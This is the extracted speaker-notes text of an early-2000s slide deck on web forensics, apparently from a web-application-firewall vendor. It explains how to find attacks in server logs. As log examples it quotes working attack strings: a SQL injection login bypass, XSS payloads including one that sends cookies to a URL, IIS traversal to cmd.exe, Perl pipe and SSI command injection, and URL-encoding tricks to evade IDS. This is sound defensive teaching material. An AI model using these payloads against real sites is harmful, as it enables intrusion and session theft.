‹header›
‹date/time›
Click to edit Master text styles
Second level
Third level
Fourth level
Fifth level
‹footer›
‹#›
In the process of learning about WWW forensics, you will also have an understanding of:
How to use initial inspection to determine if you were attacked
How to determine if an attack continues. If it does, what steps to take to eliminate it.
The actual attacks and the magnitude of damage they can cause (to later assess the damage)
How to take preventive actions for future occurrences
Assessing and repairing the damage
Let’s just look at the facts:
Code Red infected 359,000 servers in less than 14 hours at the peak, it infected more than 2,000 new hosts/minute estimated cost? $2.6B
Within 24 hours of NIMDA hitting, 50% of the infected hosts went offline including some of the largest financial, retail and govt organizations in the world
According to the FTC, $18 billion in sales is expected to be lost due to concerns about online security in 2002
And most disturbing, according to a survey published in April 2002 by San Franciscos Computer Security Institute and the FBI, 90% of the 503 security professionals surveyed––most of whom work for large corporations and government agencies––use firewalls and anti-virus solutions at their companies, and 60% use intrusion detection systems. Yet 90% still suffered in 2001 from security breaches including virus infections, Web site vandalism, credit card fraud and theft of company secrets. The most expensive breaches were cases of financial fraud, causing an average loss of $4.6 million. 85% were attacked by Internet worms like Code Red and Nimda, causing an average financial loss of $283,000 from a single worm attack. Finally, a staggering 97% of web applications audited by Sanctum Inc. were found vulnerable to application-level attacks.
Each layer of the application has its own unique vulnerabilities. A vulnerability fixed at one layer may still be exploited at another layer. An exploit at any layer of the application effects the integrity and behavior for the entire application
Definition of computer forensics from New Technologies Inc
"Computer Forensics involves the preservation, identification, extraction and documentation of computer evidence stored in the form of magnetically encoded information (data)."
Forensics is used for a variety of things including identifying and repairing damage, identifying the source of the damage in order to eliminate it, and aiding in legal action.  The field of computer forensics is vast.  This presentation will take an in-depth look into one of the less well known areas, WWW forensics.
WWW forensics applies to the world of the Internet and Web sites.  Specifically, looking at and understanding your network topology and Web applications topology, including your network devices such as mail servers, firewalls, ftp servers, and the application layer, including web servers, application servers, front and back end servers, databases, and security you have at the application layer. 
In today's Web enabled world, Web forensics has become an increasing critical component to internet security. With 75% of the hacks happening at the application layer, according to John Pescatore of the Gartner Group, the need to quickly understand what happened, how it can be prevented or eliminated, and how to recover from what has been done is receiving growing importance. 
Damage control
What was the target of the attack?
Was it successful?
How far did it go?
Countermeasures
Who is the attacker?
Can I prosecute?
What evidence do I have?
Prevention
How do I stop it from happening again?
No notes for this slide
 No notes for this slide
No notes for this slide
Logs are imperfect:
Most logs do not store 100% of the information:
They may not contain much HTML data since most info is related to the requested URL.
This is what makes WWW-hacking forensics so hard (at least at the application level).
Default configurations are often even more incomplete (Missing critical fields)
HTTP Headers (and cookies among them) are often configured by default not to be logged. In such cases, all HTTP level attacks, such as HTTP header overflows,  Cookie poisoning or even the ‘ Microsoft IIS/5.0 “Translate: f” show source vulnerability’ will not be shown differently than other “valid” request, because they only differ from “valid” request in their HTTP headers.
Special characters may not be displayed correctly
One problem with log file reading, is that it is textual, thus any special characters sent and logged will not be displayed correctly, such as NULL, CRLF etc… This can help in Anti-IDS attacks, which aim at confusing the log reader, or the process monitoring the logs, such as IDS.
In order to get the log file to be as thorough and informative as it could be, one must remember to turn on all possible log entries, such as date/time, Client IP Address, Query, all possible HTTP Headers, and if possible (usually it is not) the Body of the requests.
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
Web servers have their own root directory and own all the files and data in this directory.  Putting sensitive data in the root directory can put it at risk.  If a hacker gains control of the Web server process/daemon they can gain control of all data in the root directory. 
The best way to prevent detection is to remove the evidence.  Hackers know this and will do what they can to cover their tracks.
Keeping the log files in remote locations minimizes a hackers ability to access them.
Make sure that special control characters are sanitized before they are passed to the log files.  The best way to do this is to scrub them before they are accepted as input.
The Web server owns and updates the log files.  Clever hackers will try to trick the Web server into altering the recorded data by throwing encoded backspace and delete characters into the URL.
Other special characters can be used to attack log files at the OS level by tricking the Web server to issues commands to alter, remove, or otherwise damage system log files.
Make sure that special control characters are sanitized before they are passed to the log files.  They best way to do this is to scrub them before they are accepted as input.
The Web server owns and updates the log files.  Clever hackers will try to trick the Web server into altering the recorded data by throwing encoded backspace and delete characters into the URL.
Other special characters can be used to  attack log files at the OS level by tricking the Web server to issues commands to alter, remove, or otherwise damage system log files.
IMAGE – hacker trying to reach for a cookie jar (labeled log files) on a shelf out of reach
No notes for this slide
No notes for this slide
Uses a browser….
And scanning tools – tailor made automatic tools…..
Password grinding, cookie collecting/spoofing
Will usually start with automatic scanner to see what is available, fast
And home made tools….
May use several IPs, hide behind a proxy server
Manual methods –
typically using a browser
 Manual phase is “sparse” –see attacks once a minute or so, interwoven with “normal” browsing
Application specific attacks
A lot of experimenting
Anti-IDS techniques
Long process – can take days – but has the time……
Rapid sequence of attacks over short period of time
Single IP source
Usually HTTP, not HTTPS
Common web vulnerabilities – not application specific
A lot of 404 pages
Usually grouped by subject, sometimes alphabetically sorted...
No real session (not maintaining cookies), but may maintain HTTP authentication
May be correlated with attacks on non-HTTP ports
Download an eval version of commercial or freeware scanner
to see the footprint it leaves in your logs
Somewhat similar to downgraded scanners
So far, unlike scanners, worms attempt only few dozen HTTP attacks.
Does not perform HTTP authentication
Every batch is from a single IP, yet expect several “sessions” from different IPs (lots of machines are infected).
Attack may be correlated to non-HTTP protocols
No notes for this slide
So, where do you begin when you think you may have been hacked.
First, follow these three principles to maintain the integrity of the evidence you collect:
1. Acquire the evidence without altering or damaging the original.
2. Authenticate that your recovered evidence is the same as the originally seized data.
3. Analyze the data without modifying it.
With these principles in mind, using initial inspection,
Determine if you are still under attack
if attack continues, take immediate steps to prevent it or eliminate its impact
Apply forensics: understand the attacks and its magnitude (to later assess the damage)
Take preventive actions for future occurrences
Assess and repair damage
Gather litigation evidence as recovering stolen or damaged assets may require some type of legal action against the offending party.
No notes for this slide
What goes on here? can you tell?
Now its clear. In this session, there’s a brute force password guessing attack on the login form.
Prior to looking into what was done against the application, you first have to identify it.  This means you need to take a good look around the logs of the various components of the network and application to try and identify any behavior that fall outside of the norm and may be a hacking attempt. 
Check the system resources: memory usage, CPU consumption, process tables, disk space, log size, checksums and file time stamps, unusual temp files.
Check network usage: firewall, network load, increase usage from one or several sources.
Examine the log files: system, application, network, web.
No notes for this slide
No notes for this slide
No notes for this slide
Translate: f – nonstandard HTTP header.
Request #4208 – non standard HTTP header – SEARCH. Likely to be an attack attempt. Note there isn’t a Referer, and a session is not maintained – scanner. Request #4218 – non standard HTTP header – “Translate: f”. Indicates an attack attempt (reveal source code in Microsoft IIS/5.0). Note the backslash appended to  the script name. Note there isn’t a Referer and a session is not maintained, and the attack is site specific (relies on /search2.aspx) – hand crafted attack using a non-browser tool.
Anything which is not a good, simple and valid path in your application is suspicious.
POST parameters appear in the body of the request, hence are not logged by web servers.
No notes for this slide
Note that the attacks are not site specific – the script names are not taken from the site.
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
Note that this is a manual attack. First link is the original request. The hacker focuses on the file parameter, playing with it and modifying it until he/she understands its behavior. Then, the last three requests are actual attacks. Note the use of .. and %00. Note that session is maintained (TCP, ASINFO) since the attacker uses the browser, but the Referer is not present.
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
#4594 – a simple login request. uid=aaa & passw=bbb
#4602 – a probe. uid=‘ & passw=
#4605 – a fuller probe. Having received the error page of the above, the attacker wants to find out exactly how his/her input is processed. Hence uid=aaa’bbb & passw=ccc
#4607 – the full attack. uid=‘ or 1=1 or username=‘ & passw=
Note the SQL fragment or 1=1 or username=
Note Referer exists, session is maintained, attack is application specific.
Note that this is a POST request – web servers simply don’t log the parameters!!!
No notes for this slide
Note: Event trace diagrams are focused on showing the flow of an event with regards to time between all the involved parties. Each party is depicted as a vertical arrow pointing downwards (time is shown top to bottom), and an event is shown
by the larger arrows between parties.
No notes for this slide
No notes for this slide
No notes for this slide
#1 – “><script>alert(document.cookie)</script>
#2 – “><img src=“javascript:window.open(‘http://...?cookie=‘+document.cookie)”>
#3, #4 – “ style=background:url(javascript:...) “
#5 - <script>alert(111)</script>
Example
Remote command execution (IIS double decode bug): /scripts/..%255c..%255cwinnt/system32/cmd.exe?dir+c:\
and few thousand more...
Can also span HTTP headers and script parameters
Variations:
suspicious encoding of script extension - /script%2ejsp  /script.js%70  /script%252ejsp
appending characters to script name - /script.asp::$DATA  /script.pl+.htr  /script.pl%20
using extensions for temporary/backup copies - /script.old  /script.pl~  /script.$$$  /script.pl.tmp  /script.pl.sav
uppercase extensions - /script.JSP
8.3 file name format - /longsc~1.jsp
No notes for this slide
Using HTTP header logging, you can (even in Apache) log X-Forwarded-For and Client-IP.
Note that the TCP source of this circuit is 10.1.1.52, but this is a proxy, and actually the source is 192.168.112.12
Anti-IDS attacks are designed to sneak past IDS systems.  IDS look for specific patterns or strings. It is easy to modify the attack string so that an IDS will not recognize an attack.
The Premature request ending :
Because some IDS’s do not look at the whole request but only until the HTTP /1.0, but the web server looks at the whole request, the IDS will be tricked to think that we are actually requesting GET / HTTP/1.0 but the web server will see the request: GET /%20HTTP/1.0%0d%0aHeader:%20/../../cgi-bin/some.cgi HTTP/1.0  - Which contains  2 directories and then a traversal back up to the /cgi-bin directory
These are rather well known techniques, and signatures can be written for most of them.  But you have to know the signatures in order to write them.  Most of these type of attacks will still get through most security systems and never be seen. 
These serve as examples to show variations on the same attack.  Combining any of these attacks or altering by adding characters (/ . \), or encoding ASCII values changes the attack pattern and can fool an IDS.
Anti-IDS techniques.
This is an Apache 1.3.x log. Cannot use AppShield’s logs because the request is made canonical, and logged as such. So almost all the above requests are converted to /cgi-bin/
/cgi-bin/ - regular
HEAD /cgi-bin/ - using HEAD instead of GET (not useful here, as this is a directory)
/foobar/../cgi-bin/ - use naive ..
cgi-bin – bad URL (not starting with /)
//////////////cgi-bin/
/foobar/%2e%2e/cgi-bin/ - .. URL encoded
/./././././././cgi-bin/
/./././././././cgi-bi%6E/ - “n” URL encoded
/%252e/cgi-bin/ - “.” double encoded
/%c0%ae/cgi-bin/ - “.” overlong UTF-8 representation
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
Once the IP addresses of infected or vulnerable hosts have been identified, the host names must be resolved to the IP address.  Also, the ports and physical locations of the hosts must be identified. If the infected machine is a production machine with a static IP address, chances are that you know where to find it. If it is a laptop and gets its IP address dynamically it can be considerably more difficult to find it or the owner. Use company network information to assist with locating the infected machines
If it is not a production machine, you may not have rights to the machine. NBTSTAT can find the machine name given an IP address. DNS lookups can gather machine names for you as well as the wins database and the DHCP database. Doing name lookups manually is effective only in small outbreaks. If you have hundreds of machines involved this task becomes time consuming and error prone if done manually. Here too, any documented network information may help significantly.
Find what is infected or vulnerable  - with Code Red II, signatures were known and tools were available that could be run to determine if a system was infected and vulnerable. Various antivirus companies offer tools that can identify Code Red/II infected machines.
Let’s look at an AppShield log screenshot depicting a CodeRed worm attack. All of the red lines indicate Code Red attempts stopped by AppShield. Note, we log both the legal and illegal requests giving you the most comprehensive view of your application in the market today. Finally, what you are looking at are full online forensics that provide 24x7 insight into all activity on the site giving you the confidence and information needed to ensure your system is meeting the requirements set for it while in production.
Note: illegal hex format (%uHHHH) is logged by AppShield.
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
No notes for this slide
The request looks innocent, BUT:
1.Bad cookie is reported
2.No Referer, no session
No notes for this slide
44 – SSI injection (<!--#exec “/bin/ls” -->)
52, 54 – Perl interpreter under virtual root (/cgi-bin/perl.exe) invocation. No parameters (yet...)
53 – Perl pipe exploit (file=|/bin/ls /home/admin/)
54 – 57 – starting sequence of Nimda. Invocation of cmd.exe /c dir
No notes for this slide
#14 – buffer overflow in the path element.
#27 – buffer overflow in a parameter.
#35 – evasive buffer overflow in HTTP header (Accept-Language). Will not be logged in regular web server logs.